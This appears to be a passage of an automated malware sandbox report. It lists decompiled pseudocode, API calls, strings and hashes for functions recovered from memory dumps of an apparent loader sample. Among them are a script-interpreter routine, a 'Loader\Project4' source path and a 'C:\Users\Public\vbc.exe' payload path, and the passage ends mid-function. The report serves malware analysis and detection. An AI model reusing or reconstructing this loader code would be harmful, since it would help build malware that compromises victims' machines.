                                                  • API String ID: 900638850-4206722235
                                                  • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                  • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                  • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                  • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73051060, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 381COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E73051060(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				short _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v92;
				signed int _v104;
				signed int _v108;
				intOrPtr _v116;
				signed int _v120;
				signed int _v124;
				char _v128;
				char _v144;
				char* _t191;
				signed int _t192;
				signed int _t193;
				signed int _t200;
				signed int _t207;
				signed int _t212;
				signed int _t221;
				signed short* _t231;
				signed short* _t232;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				intOrPtr _t247;
				void* _t248;
				void* _t249;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t266;
				signed int _t282;
				signed int _t284;
				signed short* _t289;
				intOrPtr _t317;
				intOrPtr _t321;
				signed int _t324;
				signed short* _t325;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t342;
				void* _t347;

				_t332 = __esi;
				_t331 = __edi;
				_t249 = __ebx;
				_v128 =  *((intOrPtr*)(_a12 + 0x28));
				E73056AA0( &_v124, 0, 0x54);
				_t334 = _t333 + 0xc;
				_v8 = 0;
				_v128 =  *((intOrPtr*)(_a12 + 0x28));
				if(_a20 == 0) {
					_v28 =  *(_a12 + 0x10);
				} else {
					_t248 = E73051000(_a20);
					_t334 = _t334 + 4;
					if( *(_a12 + 0x10) == _t248) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					_v28 = _v24;
				}
				if(_v28 == 0) {
					_t191 =  &_v92;
					0x73050000(_t191);
					0x73050000( *((intOrPtr*)(_a12 + 4)));
					0x73050000("%s(", _t191);
					_t337 = _t334 + 0x10;
					_t192 = _a12;
					__eflags =  *(_t192 + 0x10);
					if( *(_t192 + 0x10) == 0) {
						_v108 = 0;
						L31:
						0x73050000(")\n");
						_t338 = _t337 + 4;
						_t193 = _a12;
						__eflags =  *(_t193 + 0x18);
						if( *(_t193 + 0x18) == 0) {
							_v104 = 0;
							L36:
							_v68 = 0x10;
							_v64 = 0;
							0x73050000(_v68 << 4);
							_t339 = _t338 + 4;
							_v60 = _t193;
							__eflags = _v60;
							if(_v60 != 0) {
								_t294 = _v128;
								_t258 = ( *(_a12 + 0x24) << 4) +  *_v128;
								__eflags = _t258;
								_v124 = _t258;
								_v120 = _a4;
								_v116 = _a12;
								while(1) {
									__eflags = _v124;
									if(_v124 == 0) {
										break;
									}
									_v40 =  *_v124;
									_t207 =  *((intOrPtr*)( *((intOrPtr*)(0x73061240 + _v40 * 4))))( &_v128);
									_t339 = _t339 + 4;
									_v8 = _t207;
									__eflags = _v8;
									if(_v8 >= 0) {
										_t266 = _v40;
										_t294 = ( *(0x73061340 + _t266 * 4) << 4) + _v124;
										_v124 = ( *(0x73061340 + _t266 * 4) << 4) + _v124;
										continue;
									}
									__eflags = _v72;
									if(_v72 == 0) {
										_t267 = _a4;
										__eflags =  *(_t267 + 0x38);
										if( *(_t267 + 0x38) == 0) {
											E73051040(_v128);
											_t339 = _t339 + 4;
											 *((intOrPtr*)(_a4 + 0x38)) = _v128;
											_t212 = _v124;
											_t267 =  *((intOrPtr*)(_t212 + 4));
											 *((intOrPtr*)(_a4 + 0x3c)) =  *((intOrPtr*)(_t212 + 4));
										}
										_t294 = _v64;
										E73051DA0(_t267,  &_v128, _v64);
										_t339 = _t339 + 8;
										break;
									}
									0x73050000("Failed %08x in resume next mode\n", _v8);
									_t342 = _t339 + 8;
									while(1) {
										_v124 = _v124 + 0x10;
										__eflags =  *_v124 - 5;
										if( *_v124 == 5) {
											break;
										}
									}
									0x73050000("unwind jmp %d stack_off %d\n",  *((intOrPtr*)(_v124 + 8)),  *((intOrPtr*)(_v124 + 0xc)));
									E73051C10(_a4);
									_v20 =  *((intOrPtr*)(_v124 + 0xc));
									E73052230( &_v128,  *((intOrPtr*)(_v124 + 8)));
									_t339 = _t342 + 0x18;
									_t294 = _v64;
									__eflags = _v64 - _v20;
									if(_v64 <= _v20) {
										_t294 = _v64;
										__eflags = _v64 - _v20;
										if(_v64 >= _v20) {
											L53:
											continue;
										}
										__eflags = 0;
										_v144 = 0;
										while(1) {
											_t274 = _v64;
											__eflags = _v64 - _v20;
											if(_v64 >= _v20) {
												goto L53;
											}
											_t294 =  &_v144;
											_t221 = E73051CD0(_t274,  &_v128,  &_v144);
											_t339 = _t339 + 8;
											_v8 = _t221;
											__eflags = _v8;
											if(_v8 >= 0) {
												continue;
											}
											goto L53;
										}
										goto L53;
									}
									E73051DA0( &_v128,  &_v128, _v64 - _v20);
									_t339 = _t339 + 8;
									goto L53;
								}
								__eflags = _v64;
								if(__eflags != 0) {
									_push(0xb0b);
									E73055DA9(_t249, _t294, _t331, _t332, __eflags, L"!exec.top", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
									_t339 = _t339 + 0xc;
								}
								__eflags = _a8;
								if(_a8 != 0) {
									__eflags = _v8;
									if(_v8 < 0) {
										_t262 = _a4;
										__eflags =  *(_t262 + 0x34);
										if( *(_t262 + 0x34) == 0) {
											 *((intOrPtr*)(_a4 + 0x34)) = _v8;
										}
										_t200 = _a4;
										0x73050000(_a4,  *((intOrPtr*)(_t200 + 0x38)),  *((intOrPtr*)(_a4 + 0x3c)));
										_v8 = _t200;
										E73051C10(_a4);
										_t339 = _t339 + 0x10;
									}
								}
								__eflags = _v8;
								if(_v8 >= 0) {
									__eflags = _a24;
									if(_a24 != 0) {
										_t260 = _a24;
										 *_t260 = _v56;
										 *((intOrPtr*)(_t260 + 4)) = _v52;
										 *((intOrPtr*)(_t260 + 8)) = _v48;
										 *((intOrPtr*)(_t260 + 0xc)) = _v44;
										__eflags = 0;
										_v56 = 0;
									}
								}
								E73055830( &_v128);
								return _v8;
							}
							E73055830( &_v128);
							return 0x8007000e;
						}
						0x73050000( *(_a12 + 0x18) << 4);
						_t338 = _t338 + 4;
						_v104 = _t193;
						__eflags = _v104;
						if(_v104 != 0) {
							goto L36;
						}
						E73055830( &_v128);
						return 0x8007000e;
					}
					0x73050000( *(_a12 + 0x10) << 4);
					_t337 = _t337 + 4;
					_v108 = _t192;
					__eflags = _v108;
					if(_v108 != 0) {
						_v12 = 0;
						while(1) {
							_t317 = _a12;
							__eflags = _v12 -  *((intOrPtr*)(_t317 + 0x10));
							if(_v12 >=  *((intOrPtr*)(_t317 + 0x10))) {
								break;
							}
							_t231 = E73051020(_a20, _v12);
							_t347 = _t337 + 8;
							_v16 = _t231;
							__eflags = _v12;
							if(_v12 == 0) {
								_v36 = 0x73069280;
							} else {
								_v36 = ", ";
							}
							_t232 = _v16;
							0x73050000(_t232);
							0x73050000("%s%s", _v36, _t232);
							_t337 = _t347 + 0x10;
							__eflags = ( *_v16 & 0x0000ffff) - 0x400c;
							if(( *_v16 & 0x0000ffff) != 0x400c) {
								_t234 = _v16;
								_t282 = (_v12 << 4) + _v108;
								__eflags = _t282;
								__imp__#11(_t282, _t234);
								_v8 = _t234;
							} else {
								_t321 =  *((intOrPtr*)(_a12 + 0xc));
								_t237 = _v12;
								__eflags =  *(_t321 + 4 + _t237 * 8);
								if( *(_t321 + 4 + _t237 * 8) == 0) {
									_t238 = _v16;
									_t324 = (_v12 << 4) + _v108;
									__eflags = _t324;
									__imp__#11(_t324,  *((intOrPtr*)(_t238 + 8)));
									_v8 = _t238;
								} else {
									_t289 = (_v12 << 4) + _v108;
									_t325 = _v16;
									 *_t289 =  *_t325;
									_t289[2] = _t325[2];
									_t289[4] = _t325[4];
									_t289[6] = _t325[6];
								}
							}
							__eflags = _v8;
							if(_v8 >= 0) {
								_t284 = _v12 + 1;
								__eflags = _t284;
								_v12 = _t284;
								continue;
							} else {
								E73055830( &_v128);
								return _v8;
							}
						}
						goto L31;
					}
					E73055830( &_v128);
					return 0x8007000e;
				} else {
					if(_a20 == 0) {
						_v32 = 0;
					} else {
						_t247 = E73051000(_a20);
						_t334 = _t334 + 4;
						_v32 = _t247;
					}
					0x73050000("wrong arg_cnt %d, expected %d\n", _v32,  *(_a12 + 0x10));
					return 0x80004005;
				}
			}































































                                                  0x73051060
                                                  0x73051060
                                                  0x73051060
                                                  0x7305106f
                                                  0x7305107a
                                                  0x7305107f
                                                  0x73051082
                                                  0x7305108f
                                                  0x73051096
                                                  0x730510ca
                                                  0x73051098
                                                  0x7305109c
                                                  0x730510a1
                                                  0x730510aa
                                                  0x730510b5
                                                  0x730510ac
                                                  0x730510ac
                                                  0x730510ac
                                                  0x730510bf
                                                  0x730510bf
                                                  0x730510d1
                                                  0x73051113
                                                  0x73051117
                                                  0x73051126
                                                  0x73051134
                                                  0x73051139
                                                  0x7305113c
                                                  0x7305113f
                                                  0x73051143
                                                  0x73051277
                                                  0x7305127e
                                                  0x73051283
                                                  0x73051288
                                                  0x7305128b
                                                  0x7305128e
                                                  0x73051292
                                                  0x730512c7
                                                  0x730512ce
                                                  0x730512ce
                                                  0x730512d5
                                                  0x730512e3
                                                  0x730512e8
                                                  0x730512eb
                                                  0x730512ee
                                                  0x730512f2
                                                  0x73051313
                                                  0x73051316
                                                  0x73051316
                                                  0x73051318
                                                  0x7305131e
                                                  0x73051324
                                                  0x73051327
                                                  0x73051327
                                                  0x7305132b
                                                  0x00000000
                                                  0x00000000
                                                  0x73051336
                                                  0x73051347
                                                  0x73051349
                                                  0x7305134c
                                                  0x7305134f
                                                  0x73051353
                                                  0x73051463
                                                  0x73051470
                                                  0x73051473
                                                  0x00000000
                                                  0x73051473
                                                  0x73051359
                                                  0x7305135d
                                                  0x73051427
                                                  0x7305142a
                                                  0x7305142e
                                                  0x73051434
                                                  0x73051439
                                                  0x73051442
                                                  0x73051448
                                                  0x7305144b
                                                  0x7305144e
                                                  0x7305144e
                                                  0x73051451
                                                  0x73051459
                                                  0x7305145e
                                                  0x00000000
                                                  0x7305145e
                                                  0x7305136c
                                                  0x73051371
                                                  0x73051374
                                                  0x7305137a
                                                  0x73051380
                                                  0x73051383
                                                  0x00000000
                                                  0x00000000
                                                  0x73051385
                                                  0x7305139a
                                                  0x730513a6
                                                  0x730513b4
                                                  0x730513c2
                                                  0x730513c7
                                                  0x730513ca
                                                  0x730513cd
                                                  0x730513d0
                                                  0x730513e7
                                                  0x730513ea
                                                  0x730513ed
                                                  0x73051420
                                                  0x00000000
                                                  0x73051420
                                                  0x730513ef
                                                  0x730513f1
                                                  0x730513f8
                                                  0x730513f8
                                                  0x730513fb
                                                  0x730513fe
                                                  0x00000000
                                                  0x00000000
                                                  0x73051400
                                                  0x7305140b
                                                  0x73051410
                                                  0x73051413
                                                  0x73051416
                                                  0x7305141a
                                                  0x00000000
                                                  0x7305141e
                                                  0x00000000
                                                  0x7305141c
                                                  0x00000000
                                                  0x730513f8
                                                  0x730513dd
                                                  0x730513e2
                                                  0x00000000
                                                  0x730513e2
                                                  0x7305147b
                                                  0x7305147f
                                                  0x73051481
                                                  0x73051490
                                                  0x73051495
                                                  0x73051495
                                                  0x73051498
                                                  0x7305149c
                                                  0x7305149e
                                                  0x730514a2
                                                  0x730514a4
                                                  0x730514a7
                                                  0x730514ab
                                                  0x730514b3
                                                  0x730514b3
                                                  0x730514bd
                                                  0x730514c8
                                                  0x730514d0
                                                  0x730514d7
                                                  0x730514dc
                                                  0x730514dc
                                                  0x730514a2
                                                  0x730514df
                                                  0x730514e3
                                                  0x730514e5
                                                  0x730514e9
                                                  0x730514eb
                                                  0x730514f1
                                                  0x730514f6
                                                  0x730514fc
                                                  0x73051502
                                                  0x73051505
                                                  0x73051507
                                                  0x73051507
                                                  0x730514e9
                                                  0x7305150f
                                                  0x00000000
                                                  0x73051517
                                                  0x730512f8
                                                  0x00000000
                                                  0x73051300
                                                  0x7305129e
                                                  0x730512a3
                                                  0x730512a6
                                                  0x730512a9
                                                  0x730512ad
                                                  0x00000000
                                                  0x730512c5
                                                  0x730512b3
                                                  0x00000000
                                                  0x730512bb
                                                  0x73051153
                                                  0x73051158
                                                  0x7305115b
                                                  0x7305115e
                                                  0x73051162
                                                  0x7305117a
                                                  0x7305118c
                                                  0x7305118c
                                                  0x73051192
                                                  0x73051195
                                                  0x00000000
                                                  0x00000000
                                                  0x730511a3
                                                  0x730511a8
                                                  0x730511ab
                                                  0x730511ae
                                                  0x730511b2
                                                  0x730511bd
                                                  0x730511b4
                                                  0x730511b4
                                                  0x730511b4
                                                  0x730511c4
                                                  0x730511c8
                                                  0x730511da
                                                  0x730511df
                                                  0x730511e8
                                                  0x730511ed
                                                  0x7305123f
                                                  0x73051249
                                                  0x73051249
                                                  0x7305124d
                                                  0x73051253
                                                  0x730511ef
                                                  0x730511f2
                                                  0x730511f5
                                                  0x730511f8
                                                  0x730511fd
                                                  0x73051223
                                                  0x73051230
                                                  0x73051230
                                                  0x73051234
                                                  0x7305123a
                                                  0x730511ff
                                                  0x73051205
                                                  0x73051208
                                                  0x7305120d
                                                  0x73051212
                                                  0x73051218
                                                  0x7305121e
                                                  0x7305121e
                                                  0x7305123d
                                                  0x73051256
                                                  0x7305125a
                                                  0x73051186
                                                  0x73051186
                                                  0x73051189
                                                  0x00000000
                                                  0x7305125c
                                                  0x73051260
                                                  0x00000000
                                                  0x73051268
                                                  0x7305125a
                                                  0x00000000
                                                  0x73051275
                                                  0x73051168
                                                  0x00000000
                                                  0x730510d3
                                                  0x730510d7
                                                  0x730510ea
                                                  0x730510d9
                                                  0x730510dd
                                                  0x730510e2
                                                  0x730510e5
                                                  0x730510e5
                                                  0x73051101
                                                  0x00000000
                                                  0x73051109

                                                  APIs
                                                  • _memset.LIBCMT ref: 7305107A
                                                  • VariantCopyInd.OLEAUT32(00000000,?), ref: 73051234
                                                  • VariantCopyInd.OLEAUT32(00000000,00000000), ref: 7305124D
                                                    • Part of subcall function 73055830: VariantClear.OLEAUT32(730514CC), ref: 7305583D
                                                    • Part of subcall function 73055830: VariantClear.OLEAUT32(?), ref: 730558A0
                                                    • Part of subcall function 73055830: VariantClear.OLEAUT32(?), ref: 730558DE
                                                    • Part of subcall function 73055830: SafeArrayDestroy.OLEAUT32(00000000), ref: 7305592B
                                                  Strings
                                                  • unwind jmp %d stack_off %d, xrefs: 73051395
                                                  • Failed %08x in resume next mode, xrefs: 73051367
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73051486
                                                  • wrong arg_cnt %d, expected %d, xrefs: 730510FC
                                                  • !exec.top, xrefs: 7305148B
                                                  • %s(, xrefs: 7305112F
                                                  • %s%s, xrefs: 730511D5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Variant$Clear$Copy$ArrayDestroySafe_memset
                                                  • String ID: !exec.top$%s%s$%s($C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$Failed %08x in resume next mode$unwind jmp %d stack_off %d$wrong arg_cnt %d, expected %d
                                                  • API String ID: 3331511862-798386270
                                                  • Opcode ID: 85e16ea20a3d4d618f8e1d0b741f9e5bef107a12bb1dc604bbe06ef68f9ccc3e
                                                  • Instruction ID: e99223a2096c2ea2b51dc22a9758b7c31d836271d028134cd37ded811b13f93c
                                                  • Opcode Fuzzy Hash: 85e16ea20a3d4d618f8e1d0b741f9e5bef107a12bb1dc604bbe06ef68f9ccc3e
                                                  • Instruction Fuzzy Hash: CCF127B5D00208EFEF08CF94D884F9EB7B5BB88704F248559E8166B345E735AA85CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73053760, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 730537D7
                                                  • array_id < ctx->func->array_cnt, xrefs: 730537DC
                                                  • Array already initialized, xrefs: 7305393E
                                                  • got ref.type = %d, xrefs: 7305390A
                                                  • i < script_obj->global_vars_cnt, xrefs: 7305384E
                                                  • %s, xrefs: 730537B7
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73053849
                                                  • lookup %s failed: %08x, xrefs: 730538EB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __wassert
                                                  • String ID: %s$Array already initialized$C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$array_id < ctx->func->array_cnt$got ref.type = %d$i < script_obj->global_vars_cnt$lookup %s failed: %08x
                                                  • API String ID: 3993402318-2913379245
                                                  • Opcode ID: dbc2884a05244605e843bf5595f45f0961e66d47b9f4078cbf463abb2fb40032
                                                  • Instruction ID: 269632ebe00927eaba0c9dff77f7b7b864bb61ede4f925d251c3a8e5c3bdb3d6
                                                  • Opcode Fuzzy Hash: dbc2884a05244605e843bf5595f45f0961e66d47b9f4078cbf463abb2fb40032
                                                  • Instruction Fuzzy Hash: 5681C7B9A00209DFDB05CF44C894FAEB7B2BF88714F148699E8456B355D731AE81CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73053B90, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • %s %u, xrefs: 73053BC0
                                                  • Can't resize %s, bound[%d] %d != %d, xrefs: 73053D6F
                                                  • got ref.type = %d, xrefs: 73053C1C
                                                  • ReDim Preserve not valid on type %d, xrefs: 73053C47
                                                  • Can't resize %s, cDims %d != %d, xrefs: 73053CFC
                                                  • lookup %s failed: %08x, xrefs: 73053BFD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s %u$Can't resize %s, bound[%d] %d != %d$Can't resize %s, cDims %d != %d$ReDim Preserve not valid on type %d$got ref.type = %d$lookup %s failed: %08x
                                                  • API String ID: 0-4131807084
                                                  • Opcode ID: 286a07f66f6cf760d95cf8e34be13af98e3ff9e50d35415db2c957f29ecc59b8
                                                  • Instruction ID: 2ef2c2f9cd81d6d6578634f2c86bc50044bd47175e4391b4c08231cf71278e39
                                                  • Opcode Fuzzy Hash: 286a07f66f6cf760d95cf8e34be13af98e3ff9e50d35415db2c957f29ecc59b8
                                                  • Instruction Fuzzy Hash: E361ECB6E00109EFDB04CB94D884FAEB7B5FB88B04F108599F905A7345E731AE41CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73053F20, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 73051C90: __wassert.LIBCMT ref: 73051CAD
                                                  • __wassert.LIBCMT ref: 73053F67
                                                    • Part of subcall function 73055DA9: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 73055E6E
                                                    • Part of subcall function 73055DA9: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 73055E9A
                                                  Strings
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73053F5D
                                                  • @, xrefs: 73053F92
                                                  • Could not get IEnumVARIANT iface: %08x, xrefs: 7305409D
                                                  • Unsupported iterv %s, xrefs: 73054050
                                                  • Unsupported for %s, xrefs: 73054130
                                                  • V_VT(stack_top(ctx, 0)) == VT_EMPTY, xrefs: 73053F62
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Module__wassert$FileHandleName
                                                  • String ID: @$C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$Could not get IEnumVARIANT iface: %08x$Unsupported for %s$Unsupported iterv %s$V_VT(stack_top(ctx, 0)) == VT_EMPTY
                                                  • API String ID: 1760609008-3703449541
                                                  • Opcode ID: c9ee8d30a4235225e45446086e21da38efc8b742933e0ae7102718711e4f0edc
                                                  • Instruction ID: 5b29f9b80c5bc882c45e804a9e92c6356bad99011f8579249b61442953904b0b
                                                  • Opcode Fuzzy Hash: c9ee8d30a4235225e45446086e21da38efc8b742933e0ae7102718711e4f0edc
                                                  • Instruction Fuzzy Hash: 38616EB6D00208EFDB04CBD4D884FEEB7B5AF88B01F248569F915AB355E331AA44CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730523F0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayLock.OLEAUT32(00000000), ref: 73052426
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ArrayLockSafe
                                                  • String ID: NULL array$argc %d does not match cDims %d
                                                  • API String ID: 2666096798-46779309
                                                  • Opcode ID: f0fc0e1a0ec508b5d074f5cab3f90e453a5e5dcff86f3bc8e8364375dd92b3d4
                                                  • Instruction ID: 15a98144dc89715e5de83fca9b6d159b01e2d8403fc9f8b6fc9fa3282694a027
                                                  • Opcode Fuzzy Hash: f0fc0e1a0ec508b5d074f5cab3f90e453a5e5dcff86f3bc8e8364375dd92b3d4
                                                  • Instruction Fuzzy Hash: 544119BA900208EFDB05DFA4D858F9EB7B9BF88705F508959F9199B204E734EA40CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                  0x00405dfc
                                                  0x00405e04
                                                  0x00405e18
                                                  0x00405e18
                                                  0x00405e1e
                                                  0x00405e2b
                                                  0x00405e2b
                                                  0x00405e2c
                                                  0x00405e2e
                                                  0x00405e32
                                                  0x00405e34
                                                  0x00405e3d
                                                  0x00405e3f
                                                  0x00405e59
                                                  0x00405e61
                                                  0x00405e61
                                                  0x00405e66
                                                  0x00405e68
                                                  0x00405e6a
                                                  0x00405e6e
                                                  0x00405e6f
                                                  0x00405e72
                                                  0x00405e7a
                                                  0x00405e7c
                                                  0x00405e80
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e86
                                                  0x00405e8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e8b
                                                  0x00405e90

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1374994687
                                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
